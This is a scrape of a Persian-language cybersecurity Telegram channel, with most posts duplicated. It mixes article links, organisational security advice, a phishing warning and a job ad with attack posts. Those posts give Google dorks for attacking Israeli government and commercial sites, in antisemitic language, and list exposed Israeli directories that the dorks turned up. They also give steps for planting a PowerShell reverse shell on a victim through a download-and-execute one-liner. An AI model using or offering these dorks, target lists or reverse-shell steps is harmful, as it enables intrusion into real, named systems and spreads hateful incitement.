حالا که خیلی ها درحال دور زدن EDR هستند قبل از خواب این را بخوانید
https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs
@Engineer_Computer
https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs
@Engineer_Computer
Withsecure
Spoofing Call Stacks To Confuse EDRs
Call stacks are an understated yet often important source of telemetry for EDR products.
استراتژی مهم
برای بار چندم :
🟥 انتخاب نوع سیستم عامل( ویندوز ، لینوکس و مک) حتی نسخه ی آن ؛ بایستی در خط مشی سازمان مشخص و طبق نظر واحد امنیت باشد. لذا نباید از هر سیستم عاملی در سازمان استفاده شود!!
✅️ دلیل :
بسیاری از خط مشی ها ، ابزار ها و کنترل های امنیتی وابسته به نسخه و نوع سیستم عامل هستند و شاید باید نوع و نسخه سیستم عامل با توجه به نوع استفاده و فناوری موجود در سازمان مشخص و تایید شده باشد. وگرنه ریسک های متنوعی بر سازمان اعمال خواهد شد.
🎯 برای مثال : برای برخی نسخه های سیستم عامل ویندوز هنوز بطور کامل امکان فارنزیک حافظه وجود ندارد یا برخی نسخه ها و انواع سیستم عامل لینوکس امکان نصب agent لاگ گیری را ندارند
همچنین در محیط لینوکس قابلیت های آنتی ویروس ها و DLP ها بشدت کاهش میابد
لذا
🔴 بدلیل ریسکهای امنیتی؛ با هرگونه تنوع و بی ضابطگی در حوزه سیستم عامل بشدت مقابله کنید و فضا را با تعامل با ذینفعان، مدیریت نمایید.
پی نوشت : همین دیشب درگیر IR موضوعی بودیم که با توجه به اینکه موارد فوق رعایت نشده بود، مساله قابل حل نشد.
@Engineer_Computer
برای بار چندم :
🟥 انتخاب نوع سیستم عامل( ویندوز ، لینوکس و مک) حتی نسخه ی آن ؛ بایستی در خط مشی سازمان مشخص و طبق نظر واحد امنیت باشد. لذا نباید از هر سیستم عاملی در سازمان استفاده شود!!
✅️ دلیل :
بسیاری از خط مشی ها ، ابزار ها و کنترل های امنیتی وابسته به نسخه و نوع سیستم عامل هستند و شاید باید نوع و نسخه سیستم عامل با توجه به نوع استفاده و فناوری موجود در سازمان مشخص و تایید شده باشد. وگرنه ریسک های متنوعی بر سازمان اعمال خواهد شد.
🎯 برای مثال : برای برخی نسخه های سیستم عامل ویندوز هنوز بطور کامل امکان فارنزیک حافظه وجود ندارد یا برخی نسخه ها و انواع سیستم عامل لینوکس امکان نصب agent لاگ گیری را ندارند
همچنین در محیط لینوکس قابلیت های آنتی ویروس ها و DLP ها بشدت کاهش میابد
لذا
🔴 بدلیل ریسکهای امنیتی؛ با هرگونه تنوع و بی ضابطگی در حوزه سیستم عامل بشدت مقابله کنید و فضا را با تعامل با ذینفعان، مدیریت نمایید.
پی نوشت : همین دیشب درگیر IR موضوعی بودیم که با توجه به اینکه موارد فوق رعایت نشده بود، مساله قابل حل نشد.
@Engineer_Computer
👍1
یک شروع خوب برای درگیر شدن با اتمیک تست
https://detect.fyi/atomic-test-creation-easiest-with-atomicgen-io-a4a4ec8cd9a9
@Engineer_Computer
https://detect.fyi/atomic-test-creation-easiest-with-atomicgen-io-a4a4ec8cd9a9
@Engineer_Computer
Medium
Atomic Test Creation: Easiest with AtomicGen.io
If you’re in cybersecurity, you’ve probably come across Atomic Red Team. It’s a popular tool for simulating adversary techniques. Whether…
Practical LLM Security.pdf
3 MB
پاور پوینت های امنیت LLM
@Engineer_Computer
@Engineer_Computer
نیاز به مهندسی جریان داده در سازمان قبل از راه اندازی SIEM
https://detect.fyi/why-you-need-data-engineering-pipelines-before-an-enterprise-siem-0be553584aa9
@Engineer_Computer
https://detect.fyi/why-you-need-data-engineering-pipelines-before-an-enterprise-siem-0be553584aa9
@Engineer_Computer
Medium
Why you need Data Engineering Pipelines before an enterprise SIEM
By this time you've probably heard "Data is the new oil," right? So why are still so many detection engineers dealing with log data in its…
توصیه میکنم بخوانید
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
@Engineer_Computer
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
@Engineer_Computer
Medium
Code Signing Certificate Cloning Attacks and Defenses
Before reading this post, ponder the following question: “What does it actually mean to you for something to be signed by Microsoft (or any…
⭕️ کیف پول "Jaxx Liberty" که اکنون در حال #فیشینگ و سرقت اطلاعات کاربران است، در گذشته (که معتبر بود) بهعنوان یک کیف پول معتبر توسط بسیاری از صرافیها و وبسایتها معرفی شده بود.
توجه داشته باشید که فعالیت اصلی این کیف پول متوقف شده است و شبکهای از کلاهبرداران با استفاده از دامنه آن، اقدام به فیشینگ حسابهای رمزارز کردهاند.
بدیهی است که وبسایتها و منابع معتبر باید با بروزرسانی اطلاعات خود، هشدارهای لازم درباره فعالیت جدید این کیف پول را به مخاطبان ارائه دهند.
⭕️ برای امنیت بیشتر قبل از اطمینان به هر وب سایتی، آدرس آن وبسایت را توسط هوش مصنوعی اسکم مایندر بررسی کنید.
https://scamminder.com/
@Engineer_Computer
توجه داشته باشید که فعالیت اصلی این کیف پول متوقف شده است و شبکهای از کلاهبرداران با استفاده از دامنه آن، اقدام به فیشینگ حسابهای رمزارز کردهاند.
بدیهی است که وبسایتها و منابع معتبر باید با بروزرسانی اطلاعات خود، هشدارهای لازم درباره فعالیت جدید این کیف پول را به مخاطبان ارائه دهند.
⭕️ برای امنیت بیشتر قبل از اطمینان به هر وب سایتی، آدرس آن وبسایت را توسط هوش مصنوعی اسکم مایندر بررسی کنید.
https://scamminder.com/
@Engineer_Computer
👍3
درسته کهMISP نسبت بهYETI برتر هست ولی اگر میخواید در YETI دست به آچار بشید مقاله زیر خوبه
** پلتفرم رایگان Threat intelligence
https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39
@Engineer_Computer
** پلتفرم رایگان Threat intelligence
https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39
@Engineer_Computer
Readmedium
Your Everyday Threat Intel: Build A Threat Hunting Platform at Home!
Learn how to Collect Open Source Threat Intelligence
#استخدام #تهران
سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد :
Zabbix
Lpic-1
آشنایی با grafana و splunk و ccna مزیت محسوب میشود
لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال
بفرمایید
یا با شماره 09122036944 تماس بگیرید
@Engineer_Computer
سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد :
Zabbix
Lpic-1
آشنایی با grafana و splunk و ccna مزیت محسوب میشود
لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال
بفرمایید
یا با شماره 09122036944 تماس بگیرید
@Engineer_Computer
Extract and execute a PE embedded within a PNG file using an LNK file
https://github.com/Maldev-Academy/ExecutePeFromPngViaLNK
@Engineer_Computer
https://github.com/Maldev-Academy/ExecutePeFromPngViaLNK
@Engineer_Computer
GitHub
GitHub - Maldev-Academy/ExecutePeFromPngViaLNK: Extract and execute a PE embedded within a PNG file using an LNK file.
Extract and execute a PE embedded within a PNG file using an LNK file. - Maldev-Academy/ExecutePeFromPngViaLNK
شناسایی سرور های c2 با shodan
https://readmedium.com/c2-hunting-how-to-find-c2-servers-with-shodan-c23f48ac39a4
@Engineer_Computer
https://readmedium.com/c2-hunting-how-to-find-c2-servers-with-shodan-c23f48ac39a4
@Engineer_Computer
Readmedium
C2 Hunting: How to Find C2 Servers with Shodan
C2 hunting empowers you to track down adversary C2 servers and stay a step ahead bad guys. This guide teaches you how to do it using…
گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
@Engineer_Computer
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
@Engineer_Computer
👍1
https://tzafrir.org.il/~tzafrir/git_test/.git/
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
@Engineer_Computer
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
@Engineer_Computer
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
@Engineer_Computer
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
@Engineer_Computer
نکته ی هفته :
کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند :
۱-جلوگیری کننده : preventive
مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب
۲-کشف کننده detective
مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت
۳-مدیریتی Administrative
مثال: خط مشی ؛ فرآیند و ساختار سازمان
لذا شما فقط نباید به
۱-چند لایه کردن فایروال نگاه کنید .
بلکه باید به این نگاه کنید
۲- آیا توان کشف هم دارید ؟
۳-آیا ساختار سازمانی شما اجازه میدهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟
هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی
@Engineer_Computer
کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند :
۱-جلوگیری کننده : preventive
مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب
۲-کشف کننده detective
مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت
۳-مدیریتی Administrative
مثال: خط مشی ؛ فرآیند و ساختار سازمان
لذا شما فقط نباید به
۱-چند لایه کردن فایروال نگاه کنید .
بلکه باید به این نگاه کنید
۲- آیا توان کشف هم دارید ؟
۳-آیا ساختار سازمانی شما اجازه میدهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟
هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی
@Engineer_Computer
گستره آلوده شدن توسط نرم افزار جاسوسی پگاسوس بزرگتر شد
هدف قرار گرفته شدن افراد برای جاسوسی
درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است.
https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/
@Engineer_Computer
هدف قرار گرفته شدن افراد برای جاسوسی
درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است.
https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/
@Engineer_Computer
Cyber Security News
Isreali NSO Group's Pegasus Spyware Detected in New Mobile Devices
Pegasus spyware, developed by NSO Group, shows that spyware targets not only activists and journalists but also professionals and civilians
کال بک هایی در سیستم عامل که بدافزار نویسان و امنیت چی ها دنبال آن هستند
https://codemachine.com/articles/kernel_callback_functions.html
@Engineer_Computer
https://codemachine.com/articles/kernel_callback_functions.html
@Engineer_Computer
Codemachine
CodeMachine - Article - Kernel Callback Functions
Comprehensive list of documented and undocumented APIs available in the Windows kernel to register callback routines.
Discover how Zero-Trust Network Access (ZTNA) strengthens cybersecurity, reduces costs, and streamlines remote access.
Explore best practices for seamlessly integrating ZTNA into your existing security systems.
Read:
https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html
Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience.
Learn more:
https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html
@Engineer_Computer
Explore best practices for seamlessly integrating ZTNA into your existing security systems.
Read:
https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html
Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience.
Learn more:
https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html
@Engineer_Computer